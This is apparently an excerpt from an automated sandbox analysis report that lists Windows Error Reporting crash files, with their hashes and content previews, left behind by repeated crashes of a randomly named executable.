                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.8.3.7.8.8.4.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.9.8.0.0.7.4.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.e.6.a.0.7.c.-.c.f.9.f.-.4.f.f.0.-.a.b.7.b.-.9.1.1.2.b.8.b.1.a.b.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.1.5.e.b.b.4.-.8.2.1.6.-.4.6.a.8.-.9.4.5.d.-.4.c.b.8.e.c.3.e.e.9.0.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.0.0.-.0.0.0.1.-.0.0.1.5.-.2.7.6.0.-.4.0.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_bd421862-c048-47e7-8961-b36d6722e827\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0264168793242494
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:PA+b1eAIMzAw0BU/n555KjRJd6TzuiFV9Z24IO8U85S:pJzz0BU/gjPCzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:913A07147E78FC8C6992AD8E38F453B6
                                                                                                                                                                                                                  SHA1:EC90529ED7843067092B459FFB60093F468DE149
                                                                                                                                                                                                                  SHA-256:17A719FF9FCDF2BB83A9C9F6E442000472DA8EA8B94AFABCA99443AAC20B2D3D
                                                                                                                                                                                                                  SHA-512:1DE75B502CED6CF4401A673191D53CFD4073D9B4F009CA137A267C88E5C2609523566196EE241655B56638791F6565015C063347CAB586050DCE72851C8C0E24
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.3.2.6.6.7.7.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.5.0.9.4.8.9.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.4.2.1.8.6.2.-.c.0.4.8.-.4.7.e.7.-.8.9.6.1.-.b.3.6.d.6.7.2.2.e.8.2.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.f.4.9.0.9.4.-.7.6.5.2.-.4.5.1.6.-.9.9.e.8.-.a.2.d.9.0.1.e.c.8.a.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.8.4.-.0.0.0.1.-.0.0.1.5.-.9.d.a.f.-.4.2.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_da895416-cc81-4c00-a2aa-6062ad4d5b65\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0260564046548317
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Wxp1eAIMNAw0BU/n555KjRJdSTzuiFV9Z24IO8U85S:QzN0BU/gjPKzuiFXY4IO8O
                                                                                                                                                                                                                  MD5:A9401B9A81206013078EC5DD199C2230
                                                                                                                                                                                                                  SHA1:B538858BCB511CC0C51D279CB638D24D83EB0236
                                                                                                                                                                                                                  SHA-256:33D41E54EBFC66288619538D8BDAA9158E4A3CD08B0312AB9E186BDF0F9B83B6
                                                                                                                                                                                                                  SHA-512:990F9FEC42699DE0B9469FD5DA7948C9526C52095ED64C2A25557315B85524D1F8F98AEE8C3F090E131BEF3F8CC4F1A60E09E6FEEBB881FC6EA9A3A15305DFEB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.5.1.5.3.1.1.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.6.7.7.0.0.0.0.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.8.9.5.4.1.6.-.c.c.8.1.-.4.c.0.0.-.a.2.a.a.-.6.0.6.2.a.d.4.d.5.b.6.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.8.4.c.7.d.8.-.d.1.b.9.-.4.f.5.1.-.8.0.8.0.-.1.a.e.1.2.6.9.6.2.a.2.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.0.-.0.0.0.1.-.0.0.1.5.-.0.6.b.2.-.4.f.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PMnAVsjMPucERAKE_12ae2d6cdbb4567c5635afbf27bcc9d664aca4b_602c500d_f83fa7a2-468d-4afd-af75-1f47fcbfc966\Report.wer

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                  Entropy (8bit):1.0263187127252367
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:KcZ1eAIMlAw0BU/n555KjRJd6TzuiFV9Z24IO8U85Sk:zzl0BU/gjPCzuiFXY4IO8Ok
                                                                                                                                                                                                                  MD5:3E0EB7002E19A244A1F910345E270613
                                                                                                                                                                                                                  SHA1:2DABCC233AFD62BAA570A2BB37595F0F69BB5EC6
                                                                                                                                                                                                                  SHA-256:7390B095DD0B6C297F4D2022AE273073CE5B820E4EEEFCAE9E14B1E7352003FB
                                                                                                                                                                                                                  SHA-512:2245D1DFCCC8CA401CB0690EFD3B0F2C9E3949F9A803DA403DF3ED277485CFAADE86E5E9CD8E0C29AC7E35C84703C1125A4E0D2307BC6BD69016B185B43C7E17
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.5.6.7.1.4.9.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.2.1.0.7.6.9.8.3.9.8.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.3.f.a.7.a.2.-.4.6.8.d.-.4.a.f.d.-.a.f.7.5.-.1.f.4.7.f.c.b.f.c.9.6.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.4.b.4.a.4.7.-.a.d.e.9.-.4.f.9.6.-.b.3.3.c.-.d.d.9.b.f.2.2.f.1.f.8.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.M.n.A.V.s.j.M.P.u.c.E.R.A.K.E.W.N.F.I.m.y.S.C.F.H.o.L.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.5.8.-.0.0.0.1.-.0.0.1.5.-.a.6.9.3.-.4.1.2.c.6.2.3.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.9.2.3.0.8.4.c.5.2.e.6.d.3.b.5.3.8.2.9.4.8.4.5.8.5.5.d.f.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.P.M.n.A.V.s.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER10E5.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8442
                                                                                                                                                                                                                  Entropy (8bit):3.7138145799843034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJjR96U6Y2D5SU9wgmf+KLprRG89bSEsfWdGm:R6lXJ/6U6YUSU9wgmf9nPS3f4
                                                                                                                                                                                                                  MD5:5AD8648C5D05298360A10E0460ABE5DF
                                                                                                                                                                                                                  SHA1:919A10A8B79DCD3E13BEF96586D1D9CFC4688E5D
                                                                                                                                                                                                                  SHA-256:7718A1D65C5BF096E2D6934A59B13D3775F688DF5252684F3E9A65FD45A05A7C
                                                                                                                                                                                                                  SHA-512:6EC9BD11C150D02764EECCAD531022889D27335603AB78F16753E0AB33DBBC1AB7227CB8BB1A1B626461742AF951E6DAF032997B8ED3B10F828078088FCB0A52
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.8.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1124.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.601731616735406
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYO8Ym8M4Jw1GFB+q8rCFMTmsd:uIjfZI77P7VNJwkPmTmsd
                                                                                                                                                                                                                  MD5:20A2BB451F5A9EFC27781BFE8153765E
                                                                                                                                                                                                                  SHA1:603D746EF86D5A94FBD08721F096A9E0FE6C4867
                                                                                                                                                                                                                  SHA-256:729E20719808F0B9F48EF25229E0859A1C7B5ACC4941E0E7B6E11F0DCB855CA9
                                                                                                                                                                                                                  SHA-512:100C6D477F7B3A0706AAA01A38E14E1C4F18C5D162967E5A3FFF25372D98427AF85EE2B971DA73CB61AC8FD6302701643CDE74765C9E0E2C39BA004648971986
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER120E.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8440
                                                                                                                                                                                                                  Entropy (8bit):3.712694264492118
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ0RN6EXB+D6Y2DRSU9Ngmf+KLpry89bS0sfT9Gm:R6lXJw6B6YcSU9Ngmf9NSnfh
                                                                                                                                                                                                                  MD5:37199D195A6429D7FD7DD26C46C3513E
                                                                                                                                                                                                                  SHA1:90C3BCBC0067C76A8F5549DA456987B86DD1D2DE
                                                                                                                                                                                                                  SHA-256:16813703EE48C7983F84011630E727AD63D2B3E4C1A3E314576B48E56EFE5939
                                                                                                                                                                                                                  SHA-512:6438BEB230259CECCF5FB2E0C13C82CA815D0939FC1F85248ADBEE0BE7E0D2AA3CE869A9D3D362FB0CD0591A06C06E8636B9295F9163B7BD8A44F74248DAB3E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.2.0.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER126D.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.600078484550648
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYO4Ym8M4Jw1GFL+q8rKFMTm3d:uIjfZI77P7VBJw2PmTm3d
                                                                                                                                                                                                                  MD5:82B715B27AF88E6FC58B301E83E7D1D7
                                                                                                                                                                                                                  SHA1:C558C7A6AE2A770DB789D927E1DF3E8CD6E98DE7
                                                                                                                                                                                                                  SHA-256:DF9E5BD5B663509BEA3CCB75FFA6B16BB19FA1DA67F754EB946C51B47382BCEA
                                                                                                                                                                                                                  SHA-512:9F874DE6EBD9109724FCB1C703AC894138EE1C38959CEA8395647D851C38B87773B089F7274F1CBD11926B6B6A4806A3717D99AAF794522A0A5AD8F60299099F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1625.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8446
                                                                                                                                                                                                                  Entropy (8bit):3.715405769269068
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ/RC68Po6Y2D5SU9Cgmf+KLpruq89bnbxsf/Njm:R6lXJc6r6YESU9Cgmf9MnbqfV6
                                                                                                                                                                                                                  MD5:79AA07BAFEAA5F67A541B46620497B76
                                                                                                                                                                                                                  SHA1:B7EB5496C738DFB6E1A28AB482584BD4D40446FF
                                                                                                                                                                                                                  SHA-256:A4FB5C00BF4AFFBF870524845AA3993D8893F581E4C84578DAFDCF1A223ACA90
                                                                                                                                                                                                                  SHA-512:CD5647E73779EF48F18873AD97F96DD9076C9CDD52C449059297B4B9B8F9604BDBEDEF41B9C382819F0C5B05D17436D024403C1BBCFBA1A7D8DC74250CA80F74
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.7.2.<./.P.i.

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1664.tmp.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4714
                                                                                                                                                                                                                  Entropy (8bit):4.598687794629058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zs3Jg77aI9RuWpW8VYGYm8M4Jw1GF6Y+q8rR5FMTmdd:uIjfZI77P7VyJw+I5mTmdd
                                                                                                                                                                                                                  MD5:151634FD23F84E0AF6C706E0E7639108
                                                                                                                                                                                                                  SHA1:D7182F1936F1652F4D8541C243DACE5136406863
                                                                                                                                                                                                                  SHA-256:8A6FB3309C20BA062859BAFE1D0C43CBD3BB081329DA2882A25B3D457C6B0436
                                                                                                                                                                                                                  SHA-512:A0AD171172E99C19F9CD3A21DB844E2B48008D262809D76936227C279B2244FA86D58038842AC2A86316B0552C3F437D5BBEDAE51C5CFFABB5842703DBCFAE80
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583733" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EAF.tmp.dmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:51:09 2024, 0x1205a4 type
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):854408
                                                                                                                                                                                                                  Entropy (8bit):1.6810731540591572
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:LFlPm9go9q3j9mXoGc91nazq+LlmDggKNBBp:LFleK6OoXoGcagUF
                                                                                                                                                                                                                  MD5:2EE501E2262B63096F043F91366D39C0
                                                                                                                                                                                                                  SHA1:0BD4CA59060AD6E29F9B207A369AA82079E9B772
                                                                                                                                                                                                                  SHA-256:47382ECFA445E321AD59F9B589C4C6B17A7FA8CA11D64B004C2177FA049FB589
                                                                                                                                                                                                                  SHA-512:962A67F29FFEAE1C248FBD0D957645D54D70D3E5B7283A47C3825BD9EDA39CEC029E27129EE47BDEE42964091F4FDAF86F673CB259557688CD921EEA4AF4658D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MDMP..a..... ........D2g.....................................%...E..........T.......8...........T............................/...........1..............................................................................eJ......,2......GenuineIntel............T............C2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER221B.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8442
